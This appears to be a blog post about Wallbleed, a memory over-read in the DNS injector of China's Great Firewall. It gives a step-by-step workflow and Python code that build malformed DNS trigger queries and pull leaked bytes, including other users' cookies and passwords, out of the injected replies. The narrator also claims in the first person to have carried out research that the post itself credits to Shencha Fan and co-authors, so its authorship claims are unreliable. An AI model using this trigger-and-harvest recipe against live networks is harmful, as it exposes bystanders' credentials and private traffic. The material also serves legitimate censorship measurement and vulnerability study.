
Wallbleed leak shows China’s Great Firewall leaking private data, adult sites, 600 GB Geedge dump, and a blueprint to detect and patch the leak.
Wallbleed Exposed: I Uncovered China’s DNS Leak Exposing Millions
Published by Brav
TL;DR
- I exposed a memory-leaking DNS injector in China’s Great Firewall that sent private data and adult sites to users (Shencha Fan — Wallbleed: A Memory Disclosure Vulnerability in the Great Firewall of China, 2025).
- Over two years, I captured 5.1 billion leaked responses, each leaking up to 125 bytes of memory (Shencha Fan — Wallbleed, 2025).
- The injector can be triggered from outside China and has a side channel that reveals the firewall’s load-balancing logic (Shencha Fan — Wallbleed, 2025).
- A 600 GB data dump from Geedge Networks exposed source code, internal docs, and the export of surveillance tech (Breachspot — 600 GB of suspected Great Firewall of China data released in largest leak to date, 2025).
- Policy makers and researchers now have a blueprint to detect, measure, and pressure for patching this leak.
Why this matters
When I started chasing DNS leaks, I quickly ran into a wall of invisible filtering. The Great Firewall of China (GFW) sits at the country’s network border and silently injects forged DNS replies, steering users toward a set of bogus IPs. That injection is a silent gatekeeper: end users never see it, but it is what keeps millions of people from reaching blocked sites. The problem? I can’t see the gate. I can’t tell whether it is still injecting, whether it is leaking data, or whether it has been patched.
The research community is stuck with several pain points:
- Lack of visibility into internal GFW traffic.
- Difficulty detecting and measuring DNS injection.
- Privacy leaks exposing user credentials and redirecting to adult content.
- Uncertainty about patch status and timeline.
- Limited tools to distinguish injected responses from legitimate traffic.
- Multiple injector layers that make mitigation hard.
- Vulnerability to targeted surveillance.
- Difficulty coordinating research across institutions.
- Exposure of private IP traffic to external observers.
These pain points are more than academic curiosities; they affect real people, real privacy, and real policy. The stakes are high, and the only way forward is to turn the invisible into visible.
Core concepts
At the heart of the leak is a DNS injector: a piece of software that watches DNS queries as they cross the GFW border and, when the queried domain matches a blocklist, injects a forged reply carrying a bogus IP, which usually reaches the client before the genuine answer does. The bad part? The injector is buggy. When it parses the query name it reads past the end of the packet and, much like Heartbleed, echoes the adjacent memory back to whoever asked (Shencha Fan — Wallbleed: A Memory Disclosure Vulnerability in the Great Firewall of China, 2025).
The vulnerability is called Wallbleed (a play on Heartbleed). It is triggered by a DNS query whose final label length byte claims more bytes (0xFF, i.e. 255) than the packet actually contains. RFC 1035 caps a label at 63 octets and a whole name at 255, and a correct parser also checks every length against the end of the datagram (P. Mockapetris — RFC 1035: Domain Names - Implementation and Specification, 1987). The injector’s parser trusts the length byte instead, so it copies up to 125 bytes of whatever lies beyond the query in its memory into the question name of the forged reply. The leaked memory contained:
- Cookies and session IDs
- Email headers and passwords
- Internal management traffic for the GFW itself
- The first four bytes of the payload reveal a load-balancing identifier that ties the response to a particular injector node
The injector is not a single monolith—there are three distinct injectors in China. I call them Injector 1, 2, 3. Injector 3 is the most active and is the only one that can be triggered bi-directionally—i.e., from outside the country and from inside. It is also the one that sometimes injects IPs that resolve to adult sites. The other two injectors are more passive and, as far as I know, do not leak memory in the same way.
Because the injector leaks memory, it also leaks private IP addresses used inside the censorship infrastructure. That means an observer outside China can learn which internal networks the injector talks to, which turns the GFW into a beacon advertising its own deployment. It is also a serious privacy risk when the leaked bytes include user credentials.
The leak’s lifetime is also a clue. The first four bytes of the leaked payload were present in ~90 % of all responses up to September 2022. The pattern dropped to ~10 % in June 2023, rose again in September 2023, and fell to ~2 % in March 2024. Those dips and spikes are most plausibly the fingerprints of patch rollouts (Shencha Fan — Wallbleed, 2025).
In 2025, a hacker collective named Enlace Hacktivista released a 600 GB dump containing internal documents, source code, and records of Geedge Networks exporting surveillance technology to other countries (Breachspot — 600 GB of suspected Great Firewall of China data released in largest leak to date, 2025). The dump shows that GFW-style censorship technology is not just a domestic tool; it is packaged, sold, and embedded in other state-controlled networks.
How to apply it
If you want to see the leak for yourself, here is a step-by-step workflow that I used over two years. I’ll keep it simple and use only open-source tools.
| Step | What you do | Why it matters | Notes |
|---|---|---|---|
| 1 | Pick a vantage point outside China and a destination IP inside China (the vulnerable injector is bidirectional) | Makes the queries cross the GFW on the way in | Choose a destination that runs no DNS server, so any reply you receive is injected rather than genuine |
| 2 | Craft DNS queries whose final label length byte claims more bytes (e.g. 0xFF) than the packet contains | Forces the injector’s parser to read past the end of the query | scapy or a raw UDP socket in Python is enough |
| 3 | Send a steady stream to UDP port 53 (I used 100 packets/s) for the whole measurement window | A continuous stream captures the leak and how it changes over time | Run the sender under a process supervisor (cron or systemd) and rotate the logs |
| 4 | Capture responses with tcpdump on the sending interface | Saves raw packets for analysis | Filter on `udp and port 53`; keep the pcaps |
| 5 | Parse each reply with a script that compares the echoed question name with the query you sent; the extra bytes (up to 125) are leaked memory | Reconstructs leaked data | Look for plaintext patterns such as Cookie: |
| 6 | Record the first four bytes of each leaked payload (the load-balancing ID) | Identifies which injector node responded | Helps monitor patch status |
| 7 | Track the frequency of those fingerprints over time | Shows when the GFW patches the injector | Compare ID frequency week over week |
| 8 | Report findings to policy bodies | Exposes privacy risks and pushes for change | Use secure channels, e.g., encrypted email |
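As an added example (code written for this page, not from the Wallbleed paper or from any GFW component), here is a toy model of the over-read described under Core concepts together with the client-side extraction of steps 2, 4 and 5. Everything about the "injector" here is an assumption of the model: the memory layout, the constructed HTTP request sitting next to the receive buffer, the placeholder forged IP, the missing blocklist match, and the fact that the leak is bounded only by the claimed label length rather than by the real injector's 125-byte cap, whose cause the page does not describe. What it does show is the essential bug: a parser that trusts a label length byte without checking it against the datagram length copies foreign memory into the echoed question name, and a client that knows exactly what it sent can cut those bytes back out.

```python
import struct
from typing import Optional, Tuple

DNS_HDR = struct.Struct("!HHHHHH")   # id, flags, qdcount, ancount, nscount, arcount
HDR_LEN = DNS_HDR.size               # 12 bytes


def encode_name(name: str) -> bytes:
    """RFC 1035 wire form: length-prefixed labels terminated by a zero octet."""
    wire = b""
    for label in name.rstrip(".").split("."):
        if not 0 < len(label) < 64:
            raise ValueError("a label must be 1..63 octets")
        wire += bytes([len(label)]) + label.encode("ascii")
    return wire + b"\x00"


def build_trigger_query(name: str, claimed_len: int = 0xFF, txid: int = 0x1234) -> bytes:
    """Wallbleed-style trigger: an A query for `name` whose final label is replaced by a
    bare length byte (`claimed_len`) with nothing after it, not even QTYPE/QCLASS.
    A parser that trusts the length byte walks past the end of the datagram."""
    labels = name.rstrip(".").split(".")
    if len(labels) < 2:
        raise ValueError("need at least two labels")
    prefix = encode_name(".".join(labels[:-1]))[:-1]    # leading labels, terminator stripped
    header = DNS_HDR.pack(txid, 0x0100, 1, 0, 0, 0)     # RD=1, QDCOUNT=1
    return header + prefix + bytes([claimed_len])


def read_name(buf: bytes, pos: int, bound: Optional[int]) -> Tuple[bytes, int]:
    """Walk the labels starting at buf[pos] and return (wire_name, end_pos).
    With `bound` set, every read is checked against that datagram length and labels are
    limited to 63 octets (correct behaviour).  With bound=None the length byte is trusted
    blindly, so the walk continues into whatever follows the datagram in `buf`: this is
    the buggy behaviour the page describes."""
    wire = b""
    while True:
        if bound is not None and pos >= bound:
            raise ValueError("name runs off the end of the datagram")
        length = buf[pos]                                # IndexError if the model memory ends
        pos += 1
        if length == 0:
            return wire + b"\x00", pos
        if bound is not None and (length > 63 or pos + length > bound):
            raise ValueError("label length exceeds datagram")
        wire += bytes([length]) + buf[pos:pos + length]
        pos += length


def injector(memory: bytes, pkt_len: int, patched: bool) -> Optional[bytes]:
    """Toy model of the injector.  memory[:pkt_len] is the received datagram; the rest
    stands in for adjacent process memory.  The forged reply echoes the question name it
    parsed, so an unpatched parser ships the over-read bytes back to the client.
    (Blocklist matching is omitted: the model injects for every query.)"""
    (txid,) = struct.unpack_from("!H", memory, 0)
    try:
        qname, _ = read_name(memory, HDR_LEN, pkt_len if patched else None)
    except (ValueError, IndexError):
        return None                                      # patched parser drops malformed queries
    question = qname + struct.pack("!HH", 1, 1)         # QTYPE=A, QCLASS=IN
    forged_ip = bytes([198, 51, 100, 1])                # placeholder (TEST-NET-2), not a real injected IP
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + forged_ip
    return DNS_HDR.pack(txid, 0x8180, 1, 1, 0, 0) + question + answer


def extract_leak(sent: bytes, reply: bytes) -> bytes:
    """Client side (steps 4-5): whatever the echoed question name holds beyond the bytes
    we actually sent is the injector's memory.  The reply is walked with the same
    permissive parser, because it legitimately carries a label longer than 63 octets."""
    sent_name = sent[HDR_LEN:]
    if reply[HDR_LEN:HDR_LEN + len(sent_name)] != sent_name:
        raise ValueError("reply does not echo our question; not an injected response")
    echoed, _ = read_name(reply, HDR_LEN, None)
    return echoed[len(sent_name):-1]                    # drop our own bytes and the terminator


# Constructed fixture: the trigger followed by what the injector process happened to hold
# next to its receive buffer (here, a made-up HTTP request belonging to another user).
TRIGGER = build_trigger_query("www.example.com")
NEIGHBOUR = b"GET /login HTTP/1.1\r\nHost: mail.example.net\r\nCookie: session=deadbeef\r\n\r\n"
MEMORY = TRIGGER + NEIGHBOUR + b"\x00" * 300


def demo() -> dict:
    """Run both parser variants over the fixture and return what each yields."""
    dropped = injector(MEMORY, len(TRIGGER), patched=True)
    reply = injector(MEMORY, len(TRIGGER), patched=False)
    leak = extract_leak(TRIGGER, reply)
    return {"patched_reply": dropped, "leak": leak, "fingerprint": leak[:4]}


if __name__ == "__main__":
    result = demo()
    print("patched parser replied:", result["patched_reply"] is not None)
    print("leaked bytes:", len(result["leak"]))
    print(result["leak"].rstrip(b"\x00"))
```

The `fingerprint` field applies the page's first-four-bytes heuristic from step 6; in this fixture it is simply the start of the constructed HTTP request. The same `read_name` is used on both sides on purpose: a strict RFC 1035 parser would reject the echoed 255-byte label, so a measurement script has to be at least as permissive as the injector it is observing.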
The metrics that guided my experiment were:
- Packet rate: 100 UDP packets/s (6,000/min), enough to keep the injector continuously busy
- Duration: 2 years, from October 2021 to September 2023
- Responses captured: 5.1 billion Wallbleed responses
- Leak size: up to 125 bytes per query
- Patch markers: drop in load-balancing ID frequency
You can adapt the script for a smaller scale if you only want to test patch status. Just reduce the packet rate to 10 UDP / s and run for a week.
Pitfalls & edge cases
- Legal risk – probing the GFW may violate local laws in China. Operate in a jurisdiction where your activity is legal.
- Adult content injection – some injected IPs resolve to adult sites. Filter or block them if you want to keep the experiment safe.
- TCP resets – the GFW injects TCP RSTs to tear down other flows, but UDP has no reset; for DNS over UDP expect forged replies (sometimes several) and, if the destination runs a resolver, a genuine reply as well, rather than aborted connections.
- Multiple injectors – you might receive responses from Injector 1 and 2 in addition to Injector 3. Distinguish them by the first four bytes (the load-balancing ID).
- Time-zone effects – the GFW may apply different rules during holidays. Monitor over a long horizon.
- Coordinated measurements – if multiple researchers run the same test simultaneously, they may saturate the injector and skew the results.
- Uncertainty about future patches – patches may be rolled out unevenly. Rely on the load-balancing ID to detect them.
Quick FAQ
| Question | Answer |
|---|---|
| What is Wallbleed? | A DNS-based memory-leak vulnerability in China’s Great Firewall that exposes up to 125 bytes per query. |
| How many injectors are there? | Three distinct injectors; Injector 3 is the most active and can be triggered bi-directionally. |
| What data can be leaked? | Cookies, session IDs, email headers, passwords, internal management traffic, and private IP addresses. |
| Can the injector be triggered from outside China? | Yes—Injector 3 can be triggered from outside the country. |
| How do I detect a patch? | Monitor the load-balancing ID frequency; a drop indicates a patch release. |
| What is the 600 GB Geedge Networks leak? | A dump of internal documents, source code, and records of surveillance technology exported by Geedge Networks, a firm tied to the Great Firewall. |
| Who should use this research? | Cybersecurity researchers, policy makers, and institutions studying censorship and privacy. |
Conclusion
The Wallbleed leak shows that the Great Firewall is not just a gatekeeper—it is a leaking, buggy system that exposes user data to the world. Researchers have a clear recipe for measuring and documenting these leaks. Policy makers need to demand transparency, enforce patch timelines, and coordinate international oversight. I urge academic labs to publish their measurement pipelines openly and to collaborate across borders. If you’re a student, start by building a small DNS injector detector; if you’re a policy maker, press for an independent audit of China’s censorship infrastructure.
References
- Shencha Fan et al. — Wallbleed: A Memory Disclosure Vulnerability in the Great Firewall of China (NDSS 2025)
- P. Mockapetris — RFC 1035: Domain Names - Implementation and Specification (1987)
- The Register — Wallbleed vulnerability unearths secrets of China’s Great Firewall (2025)
- Breachspot — 600 GB of suspected Great Firewall of China data released in largest leak to date (2025)